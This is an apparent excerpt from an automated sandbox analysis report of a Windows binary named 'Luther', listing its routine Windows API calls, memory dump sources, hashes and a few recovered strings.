                                                                                                          • Opcode Fuzzy Hash: a1c478b6fd0a4c86d38c88597ef80c4f4dadeae7e13ede9d0b8b32145eca2603
                                                                                                          • Instruction Fuzzy Hash: 0A115831A0101AAFCB009FA4C949DEEBBB8EB44345F404466E902B2140C732AA82EBB1
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00E9EB14
                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00E9EB47
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E9EB5D
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E9EB64
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 2880819207-0
                                                                                                          • Opcode ID: 8ea02d8504743dc8bd02a6793d01cc9e0f9e4977216698bd7ad06ff66cda193a
                                                                                                          • Instruction ID: 9e94ce8ec715af83509fd4fced376d9eb54540d1963a6c91741371904e6045aa
                                                                                                          • Opcode Fuzzy Hash: 8ea02d8504743dc8bd02a6793d01cc9e0f9e4977216698bd7ad06ff66cda193a
                                                                                                          • Instruction Fuzzy Hash: 9A110472904218BFCB11DBA89C0AE9E7FACBB45324F044266F915F3390E676890987B0
                                                                                                          APIs
                                                                                                          • CreateThread.KERNEL32(00000000,?,00E5D369,00000000,00000004,00000000), ref: 00E5D588
                                                                                                          • GetLastError.KERNEL32 ref: 00E5D594
                                                                                                          • __dosmaperr.LIBCMT ref: 00E5D59B
                                                                                                          • ResumeThread.KERNEL32(00000000), ref: 00E5D5B9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                          • String ID:
                                                                                                          • API String ID: 173952441-0
                                                                                                          • Opcode ID: ae134f3ed02c8f40e0717080aaf64208aa40411adf71b0095696530ce451b9d0
                                                                                                          • Instruction ID: ccaa75bd38e9f9fb34c7647fcc5a5f971c8603a080f0f93bd938008d2d759e5e
                                                                                                          • Opcode Fuzzy Hash: ae134f3ed02c8f40e0717080aaf64208aa40411adf71b0095696530ce451b9d0
                                                                                                          • Instruction Fuzzy Hash: 0F01D632409214BBDB316FA5DC05FAA7B69EF41737F101629FD25B61E0EB718809C6A1
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E378B1
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00E378C5
                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E378CF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3970641297-0
                                                                                                          • Opcode ID: 70e775107fbac5c0a8264e260ed7bbeea2a0f1345a72fa68d1de0fc391ff9aba
                                                                                                          • Instruction ID: 8086e5f7565b7b0b00114c7e236097a8ff9a32b7bc410a122496c2a5653ece7e
                                                                                                          • Opcode Fuzzy Hash: 70e775107fbac5c0a8264e260ed7bbeea2a0f1345a72fa68d1de0fc391ff9aba
                                                                                                          • Instruction Fuzzy Hash: 2811A1B2505518BFDF165F90CC58EEABF69FF48398F041126FA0462110D732DC60EBA0
                                                                                                          APIs
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00E6338D,00000364,00000000,00000000,00000000,?,00E635FE,00000006,FlsSetValue), ref: 00E63418
                                                                                                          • GetLastError.KERNEL32(?,00E6338D,00000364,00000000,00000000,00000000,?,00E635FE,00000006,FlsSetValue,00ED3260,FlsSetValue,00000000,00000364,?,00E631B9), ref: 00E63424
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E6338D,00000364,00000000,00000000,00000000,?,00E635FE,00000006,FlsSetValue,00ED3260,FlsSetValue,00000000), ref: 00E63432
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 3177248105-0
                                                                                                          • Opcode ID: a179bd777fdb7517fe0ea09415f41ed12f2df0dc08e1995162926e754dc98844
                                                                                                          • Instruction ID: ea88c0db5ef7c0acbfc41e3896a781fac4646c654f657863df643eef5ab59d79
                                                                                                          • Opcode Fuzzy Hash: a179bd777fdb7517fe0ea09415f41ed12f2df0dc08e1995162926e754dc98844
                                                                                                          • Instruction Fuzzy Hash: 4A01D8326552229BC7224B7ABC44D56FB58FF14BF57111230F916F3141CB22DD06C6E0
                                                                                                          APIs
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E9B69A,?,00008000), ref: 00E9BA8B
                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E9B69A,?,00008000), ref: 00E9BAB0
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E9B69A,?,00008000), ref: 00E9BABA
                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E9B69A,?,00008000), ref: 00E9BAED
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 2875609808-0
                                                                                                          • Opcode ID: 495a7e23154c2cb6bf07adce21d1e694d1c76c531d7f24f631935ed014dcb18b
                                                                                                          • Instruction ID: 3580445d8789bd6baa168a8c39f75721c4d03d26d4c0fbf3d0a99e0674256e54
                                                                                                          • Opcode Fuzzy Hash: 495a7e23154c2cb6bf07adce21d1e694d1c76c531d7f24f631935ed014dcb18b
                                                                                                          • Instruction Fuzzy Hash: 4E117C70C05519EBCF009FE5EA48AEEBB78BF09710F1100A5D541B2140CBB15654CBA1
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00EC888E
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00EC88A6
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00EC88CA
                                                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EC88E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 357397906-0
                                                                                                          • Opcode ID: 258c4db52ac4f9831ab72b825d945d445d2278ab25d000b6a7ef504a5ea5dfd1
                                                                                                          • Instruction ID: 62e7f093f150f0783d1980feb5f554b9b0d793bb38d0ac5c524d43cfe39039b5
                                                                                                          • Opcode Fuzzy Hash: 258c4db52ac4f9831ab72b825d945d445d2278ab25d000b6a7ef504a5ea5dfd1
                                                                                                          • Instruction Fuzzy Hash: AD1160B9D00209AFDB01CFA9C984AEEFBB5FB08314F508166E915E2210D736AA55CF50
                                                                                                          APIs
                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E93712
                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E93723
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00E9372A
                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E93731
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2710830443-0
                                                                                                          • Opcode ID: 1bd9ccef1bffa7b12f24f564956cc0a500cbb65e153ebbe2d1ce2803334d6441
                                                                                                          • Instruction ID: fcb849aae2ff7e04c3d30ced8330746d61af47247f01ffbdca204be2a25601d6
                                                                                                          • Opcode Fuzzy Hash: 1bd9ccef1bffa7b12f24f564956cc0a500cbb65e153ebbe2d1ce2803334d6441
                                                                                                          • Instruction Fuzzy Hash: BAE06DF11052247EDA2017A39C4DEEBBF6CDB42BA1F000036F505F2080DAA28946C2B0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E31F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E31F87
                                                                                                            • Part of subcall function 00E31F2D: SelectObject.GDI32(?,00000000), ref: 00E31F96
                                                                                                            • Part of subcall function 00E31F2D: BeginPath.GDI32(?), ref: 00E31FAD
                                                                                                            • Part of subcall function 00E31F2D: SelectObject.GDI32(?,00000000), ref: 00E31FD6
                                                                                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00EC92E3
                                                                                                          • LineTo.GDI32(?,?,?), ref: 00EC92F0
                                                                                                          • EndPath.GDI32(?), ref: 00EC9300
                                                                                                          • StrokePath.GDI32(?), ref: 00EC930E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                          • String ID:
                                                                                                          • API String ID: 1539411459-0
                                                                                                          • Opcode ID: 3b73be6cd3c8d78ccea8ae4d04d6e9d015ab1f2d01be6553e9b81d69c848ba39
                                                                                                          • Instruction ID: 697187ecfa75c1c5a0743b80c014444624d1fe41a13248274cd94f1eb9eb0d35
                                                                                                          • Opcode Fuzzy Hash: 3b73be6cd3c8d78ccea8ae4d04d6e9d015ab1f2d01be6553e9b81d69c848ba39
                                                                                                          • Instruction Fuzzy Hash: 4EF05E32009258BADB125F59AD0EFCE3F5AAF0A324F049015FA11310E2C7779527EBA5
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(00000008), ref: 00E321BC
                                                                                                          • SetTextColor.GDI32(?,?), ref: 00E321C6
                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00E321D9
                                                                                                          • GetStockObject.GDI32(00000005), ref: 00E321E1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$ModeObjectStockText
                                                                                                          • String ID:
                                                                                                          • API String ID: 4037423528-0
                                                                                                          • Opcode ID: 6017c7ade721ba09d5c95d717e2f725f94a550f5cabb450ec1cce2d167de7ae7
                                                                                                          • Instruction ID: d8bdc85eda09cc488fef0e21cc2c64c0c4f91afa44c6986c885f2ea8fe471ffe
                                                                                                          • Opcode Fuzzy Hash: 6017c7ade721ba09d5c95d717e2f725f94a550f5cabb450ec1cce2d167de7ae7
                                                                                                          • Instruction Fuzzy Hash: 1CE06531245240AEDB215B75BC09BE87B11AB11335F08C339F7F9740E0C7738645AB11
                                                                                                          APIs
                                                                                                          • GetDesktopWindow.USER32 ref: 00E8EC36
                                                                                                          • GetDC.USER32(00000000), ref: 00E8EC40
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E8EC60
                                                                                                          • ReleaseDC.USER32(?), ref: 00E8EC81
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2889604237-0
                                                                                                          • Opcode ID: e26b36e42b7e12634cd550fa5a96fa1e74476e463e2a652e77bb19dd8b106b96
                                                                                                          • Instruction ID: b710fc1e23f82c57d27e0f74d31048bc4fda7328e17be38c9f961ca5f73d9ec0
                                                                                                          • Opcode Fuzzy Hash: e26b36e42b7e12634cd550fa5a96fa1e74476e463e2a652e77bb19dd8b106b96
                                                                                                          • Instruction Fuzzy Hash: A5E0E5B0804204EFCB41AFA19D09E9DBBB1BB08310F108469E85AF3350C73A5906DF00
                                                                                                          APIs
                                                                                                          • GetDesktopWindow.USER32 ref: 00E8EC4A
                                                                                                          • GetDC.USER32(00000000), ref: 00E8EC54
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E8EC60
                                                                                                          • ReleaseDC.USER32(?), ref: 00E8EC81
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2889604237-0
                                                                                                          • Opcode ID: 16a02a060d5d3e1c089949769eb672c4e0622b293132832e2c20fc080bef8608
                                                                                                          • Instruction ID: 2d79014dd71ab20576583475c5f14e424daede66bbb0846f4574973b65b3b505
                                                                                                          • Opcode Fuzzy Hash: 16a02a060d5d3e1c089949769eb672c4e0622b293132832e2c20fc080bef8608
                                                                                                          • Instruction Fuzzy Hash: 0CE012B0C08204EFCB419FA1DC09A9DBBB1BB08310F108479E85AF3390CB3A6906DF00
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadString
                                                                                                          • String ID: @COM_EVENTOBJ$bn
                                                                                                          • API String ID: 2948472770-192135924
                                                                                                          • Opcode ID: b8187245206061def3ac5b47625689c08ed6609a9a5eec5dcae926d1ac2f14d8
                                                                                                          • Instruction ID: 7290fcdae83960a5305dda887c5370dc22ed6bf1a1fef609ce424f6b60b6847d
                                                                                                          • Opcode Fuzzy Hash: b8187245206061def3ac5b47625689c08ed6609a9a5eec5dcae926d1ac2f14d8
                                                                                                          • Instruction Fuzzy Hash: 07F171706087009FD718EF24C841B6AB7E1BF84B08F14995DF58EB7291D775EA45CB82
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E505B2: EnterCriticalSection.KERNEL32(00F0170C,?,00000000,?,00E3D22A,00F03570,00000001,00000000,?,?,00EAF023,?,?,00000000,00000001,?), ref: 00E505BD
                                                                                                            • Part of subcall function 00E505B2: LeaveCriticalSection.KERNEL32(00F0170C,?,00E3D22A,00F03570,00000001,00000000,?,?,00EAF023,?,?,00000000,00000001,?,00000001,00F02430), ref: 00E505FA
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                            • Part of subcall function 00E50413: __onexit.LIBCMT ref: 00E50419
                                                                                                          • __Init_thread_footer.LIBCMT ref: 00EB8658
                                                                                                            • Part of subcall function 00E50568: EnterCriticalSection.KERNEL32(00F0170C,00000000,?,00E3D258,00F03570,00E727C9,00000001,00000000,?,?,00EAF023,?,?,00000000,00000001,?), ref: 00E50572
                                                                                                            • Part of subcall function 00E50568: LeaveCriticalSection.KERNEL32(00F0170C,?,00E3D258,00F03570,00E727C9,00000001,00000000,?,?,00EAF023,?,?,00000000,00000001,?,00000001), ref: 00E505A5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                          • String ID: Variable must be of type 'Object'.$bn
                                                                                                          • API String ID: 535116098-2837176596
                                                                                                          • Opcode ID: 646555c0eb6e485d60e4a6edf97fb99e9c428dc5425435caee2daf143f66de58
                                                                                                          • Instruction ID: b295070ead0f8ba79434c561d71deb0caf3f9c226abf4da92da041e9c7cfa07b
                                                                                                          • Opcode Fuzzy Hash: 646555c0eb6e485d60e4a6edf97fb99e9c428dc5425435caee2daf143f66de58
                                                                                                          • Instruction Fuzzy Hash: 88915D74A00208AFCB04EF54DA91DEEBBB9BF44304F509059F946BB392DB71AE45DB50
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E341EA: _wcslen.LIBCMT ref: 00E341EF
                                                                                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00EA5919
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Connection_wcslen
                                                                                                          • String ID: *$LPT
                                                                                                          • API String ID: 1725874428-3443410124
                                                                                                          • Opcode ID: e7f161045ff513125421d9e676917b0bcb5bcfe057053c565dbdaa3bf0789786
                                                                                                          • Instruction ID: 879ca91cb5cd400360dd8a2d6dfa83744f55276cbb3f0b3560880d87565d4930
                                                                                                          • Opcode Fuzzy Hash: e7f161045ff513125421d9e676917b0bcb5bcfe057053c565dbdaa3bf0789786
                                                                                                          • Instruction Fuzzy Hash: AF917F76A00604DFCB14DF54C484EAABBF1AF49318F199099E85A6F362C735FE85CB90
                                                                                                          APIs
                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00E5E67D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorHandling__start
                                                                                                          • String ID: pow
                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                          • Opcode ID: 3545b7a24b78d98e00e04038369007b4dceb54c13cf66aea7b84c76c7e6d74b3
                                                                                                          • Instruction ID: a2183823da37d5626fa6d90080ced1e04b266a6f0a7b3cffab094c5190df9cb6
                                                                                                          • Opcode Fuzzy Hash: 3545b7a24b78d98e00e04038369007b4dceb54c13cf66aea7b84c76c7e6d74b3
                                                                                                          • Instruction Fuzzy Hash: F551AD60E4A1028AC7197714EE013AA2BE0EB117C5F207F59F891713E9DF718E8D9A43
                                                                                                          Strings
